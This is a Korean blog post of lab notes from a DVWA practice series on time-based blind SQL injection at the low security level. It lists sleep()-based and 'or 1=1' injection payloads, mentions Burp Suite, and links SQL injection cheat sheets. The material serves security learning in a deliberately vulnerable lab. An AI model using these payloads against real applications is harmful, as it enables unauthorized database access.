728x90
sql 인젝션이란?
https://choimungu.tistory.com/207
GH(NOB); SQL 인젝션
SQL 인젝션 공격이란? : 웹 애플리케이션에서 입력 받아 데이터베이스로 전달하는 정상적인 SQL 쿼리를 변조, 삽입하여 불법 로그인, DB 데이터 열람, 시스템 명령 실행 등을 수행하여 비정상적인
choimungu.tistory.com
공격 실습)
low
1' and sleep(5)#
1' AND sleep(5)#
6' AND sleep(5)#
버프스위트
select user from users where id='1' or1=1#
개발자 네트워크에서 sleep()사용하는
참이면 sleep()값 만큼 값이 미뤄짐
거짓이면 바로 결과가 나오고
time
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
https://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
https://www.owasp.org/index.php/Blind_SQL_Injection
http://bobby-tables.com/
'해킹과 보안 동향 > DVWA' 카테고리의 다른 글
| dvwa. XSS 공격 #9-1(low) (0) | 2023.06.07 |
|---|---|
| dvwa. sql 인젝션 #7-2(medium, high, impossible) (0) | 2023.06.06 |
| dvwa. sql 인젝션 #7-1(low) (0) | 2023.05.31 |
| dvwa. CAPTCHA 공격 #6-2(medium, high, impossible) (0) | 2023.05.31 |
| dvwa. 파일 업로드 공격 #5-2(medium, high, impossible) (0) | 2023.05.29 |
